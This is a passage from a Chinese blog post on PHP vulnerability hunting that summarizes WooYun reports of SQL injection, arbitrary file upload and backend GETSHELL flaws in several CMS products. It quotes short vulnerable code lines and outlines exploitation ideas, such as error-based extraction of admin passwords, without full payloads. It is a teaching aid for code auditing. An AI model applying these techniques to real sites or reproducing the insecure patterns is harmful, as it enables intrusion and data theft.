<h2 id="0x0e-WanCMS多处SQL注射（源码详析-实站演示）"><a href="#0x0e-WanCMS多处SQL注射（源码详析-实站演示）" class="headerlink" title="0x0e WanCMS多处SQL注射（源码详析+实站演示）"></a>0x0e WanCMS多处SQL注射（源码详析+实站演示）</h2><p><a href="https://shuimugan.com/bug/view?bug_no=49372" target="_blank">WooYun: WanCMS多处SQL注射（源码详析+实站演示）</a></p>
<p>又是一个框架中注射的例子</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$u_info = $member-&gt;where ( <span class="string">"username ='"</span> . $username . <span class="string">"'"</span> )-&gt;find ();</span><br></pre></td></tr></table></figure>

<p>之前<code>username</code>没有过滤，虽然看着和带着<code>SELECT</code>的完整<code>SQL</code>语句有区别，但是效果是一样的</p>
<h2 id="0x0f-CSCMS-V3-5-最新补丁后又一个SQL注射（源码详析）"><a href="#0x0f-CSCMS-V3-5-最新补丁后又一个SQL注射（源码详析）" class="headerlink" title="0x0f CSCMS V3.5 最新补丁后又一个SQL注射（源码详析）"></a>0x0f CSCMS V3.5 最新补丁后又一个SQL注射（源码详析）</h2><p><a href="https://shuimugan.com/bug/view?bug_no=50942" target="_blank">WooYun: CSCMS V3.5 最新补丁后 又一个SQL注射（源码详析）</a></p>
<p>这个就是一个厂商漏补的<code>addslash</code>+无引号盲注,但是比较有新意的是，他们好像有一阵是用的<code>magic_quotes_gpc</code>来处理的，只是给数字补上了好多的引号，而且还漏了几个……</p>
<h2 id="0x10-TCCMS（最新）8-0后台GETSHELL（源码详析）"><a href="#0x10-TCCMS（最新）8-0后台GETSHELL（源码详析）" class="headerlink" title="0x10 TCCMS（最新）8.0后台GETSHELL（源码详析）"></a>0x10 TCCMS（最新）8.0后台GETSHELL（源码详析）</h2><p><a href="https://shuimugan.com/bug/view?bug_no=50834" target="_blank">WooYun: TCCMS（最新）8.0后台GETSHELL（源码详析）</a></p>
<p>任意文件上传，前提是<code>upload</code>为<code>ON</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$fullPath = $path . <span class="string">"/"</span> . $_POST[<span class="string">"name"</span>];</span><br></pre></td></tr></table></figure>

<p>居然直接从<code>POST</code>里面取。</p>
<p>一般情况下应该是<code>uid</code>随机数名称，或者至少去不可见字符强加后缀。</p>
<p>直接从<code>POST</code>中取值的下场就是任意文件上传。</p>
<h2 id="0x11-iSiteCMS-发布安全补丁后仍然有几处注射漏洞（源码详析-实站演示）"><a href="#0x11-iSiteCMS-发布安全补丁后仍然有几处注射漏洞（源码详析-实站演示）" class="headerlink" title="0x11 iSiteCMS 发布安全补丁后仍然有几处注射漏洞（源码详析+实站演示）"></a>0x11 iSiteCMS 发布安全补丁后仍然有几处注射漏洞（源码详析+实站演示）</h2><p><a href="https://shuimugan.com/bug/view?bug_no=46702" target="_blank">WooYun: iSiteCMS发布安全补丁后仍然有几处注射漏洞（源码详析+实站演示）</a></p>
<p>这个注射有一个特别之处，就是过滤了逗号<code>,</code>，因此跑表时非常不顺利，需要想其他的方法来验证危害</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$tos = explode(<span class="string">','</span>,trim($arr[<span class="string">'to'</span>]));</span><br></pre></td></tr></table></figure>

<p>没错，这一句干掉了逗号</p>
<p>解决方案：不跑表了，试着构造错误回显（因为常规那页面是没有回显的）直接爆管理员密码</p>
<p>思路总结：变量到达第一个注射语句没有逗号无法突破无法回显，坚持继续读，程序能继续运行，然后发现下面还有一句也会被注射到，然后注射到的结果又拼接到另一个<code>SQL</code>语句中，而报错又是开启状态，因此构造一下在<code>SQL</code>报错的地方回显出密码</p>
<h2 id="0x12-CSCMS-V3-5最新版后台命令执行GETSHELL（源码详析）"><a href="#0x12-CSCMS-V3-5最新版后台命令执行GETSHELL（源码详析）" class="headerlink" title="0x12 CSCMS V3.5最新版后台命令执行GETSHELL（源码详析）"></a>0x12 CSCMS V3.5最新版后台命令执行GETSHELL（源码详析）</h2><p><a href="https://shuimugan.com/bug/view?bug_no=46603" target="_blank">WooYun: CSCMS V3.5 最新版 后台命令执行GETSHELL（源码详析）</a></p>
<p>感谢<code>@insight-labs</code>的回复：框架会有很多很隐蔽的洞，现在还不太清楚怎么具体挖掘，比如双引号导致的代码执行。</p>
<p>千奇百怪的洞的确很头疼我这个漏洞本是想仿造<code>《Dede后台getshell[过20130715]》</code>原作者不详 结果……不大一样 不过思路是：后台总会有保存设置的地方，而保存设置的地方往往是写<code>config.php</code>保存设置（因为<code>php</code>扩展名可以防止被随意下载<code>ETC</code>）而这样的话如果保存设置时过滤不足，就有可能导致任意文件写入，而且又是<code>php</code>文件，动不动就会来个代码执行）</p>
<p>不过感觉隐蔽的漏洞还是很费脑力的，一般的思考发现不了</p>
<p><code>http://drops.wooyun.org/tips/858</code></p>
</section>
    <!-- Tags START -->
    
    <!-- Tags END -->
    <!-- NAV START -->
    
  <div class="nav-container">
    <!-- reverse left and right to put prev and next in a more logic postition -->
    
      <a class="nav-left" href="/2019/07/27/PHP代码审计分段讲解/">
        <span class="nav-arrow">← </span>
        
          (untitled)
        
      </a>
    
    
      <a class="nav-right" href="/2019/07/27/PHP漏洞挖掘思路+实例 第一章/">
        
          (untitled)
        
        <span class="nav-arrow"> →</span>
      </a>
    
  </div>

    <!-- NAV END -->
    <!-- 打赏 START -->
    
      <div class="money-like">
        <div class="reward-btn">
          赏
          <span class="money-code">
            <span class="alipay-code">
              <div class="code-image"></div>
              <b>使用支付宝打赏</b>
            </span>
            <span class="wechat-code">
              <div class="code-image"></div>
              <b>使用微信打赏</b>
            </span>
          </span>
        </div>
        <p class="notice">若你觉得我的文章对你有帮助，欢迎点击上方按钮对我打赏</p>
      </div>
    
    <!-- 打赏 END -->
    <!-- 二维码 START -->
    
      <div class="qrcode">
        <canvas id="share-qrcode"></canvas>
        <p class="notice">扫描二维码，分享此文章</p>
      </div>
    
    <!-- 二维码 END -->
    
      <!-- No Comment -->
    
  </article>
  <!-- Article END -->
  <!-- Catalog START -->
  
    <aside class="catalog-container">
  <div class="toc-main">
    <strong class="toc-title">Catalog</strong>
    
      <ol class="toc-nav"><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x00-背景"><span class="toc-nav-text">0x00 背景</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x01-任意文件包含"><span class="toc-nav-text">0x01 任意文件包含</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x02-本地文件包含"><span class="toc-nav-text">0x02 本地文件包含</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x03-任意文件下载"><span class="toc-nav-text">0x03 任意文件下载</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x04-SQL注入"><span class="toc-nav-text">0x04 SQL注入</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x05-命令执行"><span class="toc-nav-text">0x05 命令执行</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#5-4-代码注射"><span class="toc-nav-text">5.4 代码注射</span></a></li></ol></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x06-跨站脚本漏洞XSS"><span class="toc-nav-text">0x06 跨站脚本漏洞XSS</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x07-变量覆盖"><span class="toc-nav-text">0x07 变量覆盖</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x08-admin节点可被越权访问"><span class="toc-nav-text">0x08 admin节点可被越权访问</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x09-跨站点请求伪造CSRF"><span class="toc-nav-text">0x09 跨站点请求伪造CSRF</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x0a-参考文献"><span class="toc-nav-text">0x0a 参考文献</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x0b-CSCMS-V3-5-最新版SQL注射（官方站演示-源码详析）"><span class="toc-nav-text">0x0b CSCMS V3.5 最新版SQL注射（官方站演示+源码详析）</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x0c-MacCMS全版本通杀SQL注射（包括最新7-x）"><span class="toc-nav-text">0x0c MacCMS全版本通杀SQL注射（包括最新7.x）</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x0d-WanCMS-可修改任意用户密码（源码详析-实例演示）"><span class="toc-nav-text">0x0d WanCMS 可修改任意用户密码（源码详析+实例演示）</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x0e-WanCMS多处SQL注射（源码详析-实站演示）"><span class="toc-nav-text">0x0e WanCMS多处SQL注射（源码详析+实站演示）</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x0f-CSCMS-V3-5-最新补丁后又一个SQL注射（源码详析）"><span class="toc-nav-text">0x0f CSCMS V3.5 最新补丁后又一个SQL注射（源码详析）</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x10-TCCMS（最新）8-0后台GETSHELL（源码详析）"><span class="toc-nav-text">0x10 TCCMS（最新）8.0后台GETSHELL（源码详析）</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x11-iSiteCMS-发布安全补丁后仍然有几处注射漏洞（源码详析-实站演示）"><span class="toc-nav-text">0x11 iSiteCMS 发布安全补丁后仍然有几处注射漏洞（源码详析+实站演示）</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x12-CSCMS-V3-5最新版后台命令执行GETSHELL（源码详析）"><span class="toc-nav-text">0x12 CSCMS V3.5最新版后台命令执行GETSHELL（源码详析）</span></a></li></ol>
    
  </div>
</aside>
  
  <!-- Catalog END -->
</main>

<script>
  (function () {
    var url = 'https://storysec.github.io/2019/07/27/PHP漏洞挖掘思路+实例 第二章/';
    var banner = ''
    if (banner !== '' && banner !== 'undefined' && banner !== 'null') {
      $('#article-banner').css({
        'background-image': 'url(' + banner + ')'
      })
    } else {
      $('#article-banner').geopattern(url)
    }
    $('.header').removeClass('fixed-header')

    // error image
    $(".markdown-content img").on('error', function() {
      $(this).attr('src', 'http://file.muyutech.com/error-img.png')
      $(this).css({
        'cursor': 'default'
      })
    })

    // zoom image
    $(".markdown-content img").on('click', function() {
      var src = $(this).attr('src')
      if (src !== 'http://file.muyutech.com/error-img.png') {
        var imageW = $(this).width()
        var imageH = $(this).height()

        var zoom = ($(window).width() * 0.95 / imageW).toFixed(2)
        zoom = zoom < 1 ? 1 : zoom
        zoom = zoom > 2 ? 2 : zoom
        var transY = (($(window).height() - imageH) / 2).toFixed(2)

        $('body').append('<div class="image-view-wrap"><div class="image-view-inner"><img src="'+ src +'" /></div></div>')
        $('.image-view-wrap').addClass('wrap-active')
        $('.image-view-wrap img').css({
          'width': `${imageW}`,
          'transform': `translate3d(0, ${transY}px, 0) scale3d(${zoom}, ${zoom}, 1)`
        })
        $('html').css('overflow', 'hidden')

        $('.image-view-wrap').on('click', function() {
          $(this).remove()
          $('html').attr('style', '')
        })
      }
    })
  })();
</script>


  <script>
    var qr = new QRious({
      element: document.getElementById('share-qrcode'),
      value: document.location.href
    });
  </script>






    <div class="scroll-top">
  <span class="arrow-icon"></span>
</div>
    <footer class="app-footer">
  <p class="copyright">
    &copy; 2019 | Proudly powered by <a href="https://hexo.io" target="_blank">Hexo</a>
    <br>
    Theme by <a href="https://github.com/yanm1ng">yanm1ng</a>
  </p>
</footer>

<script>
  function async(u, c) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (c) { o.addEventListener('load', function (e) { c(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }
</script>
<script>
  async("//cdnjs.cloudflare.com/ajax/libs/fastclick/1.0.6/fastclick.min.js", function(){
    FastClick.attach(document.body);
  })
</script>

<script>
  var hasLine = 'true';
  async("//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js", function(){
    $('figure pre').each(function(i, block) {
      var figure = $(this).parents('figure');
      if (hasLine === 'false') {
        figure.find('.gutter').hide();
      }
      var lang = figure.attr('class').split(' ')[1] || 'code';
      var codeHtml = $(this).html();
      var codeTag = document.createElement('code');
      codeTag.className = lang;
      codeTag.innerHTML = codeHtml;
      $(this).attr('class', '').empty().html(codeTag);
      figure.attr('data-lang', lang.toUpperCase());
      hljs.highlightBlock(block);
    });
  })
</script>
<!-- Baidu Tongji -->

<script src="/js/script.js"></script>
  </body>
</html>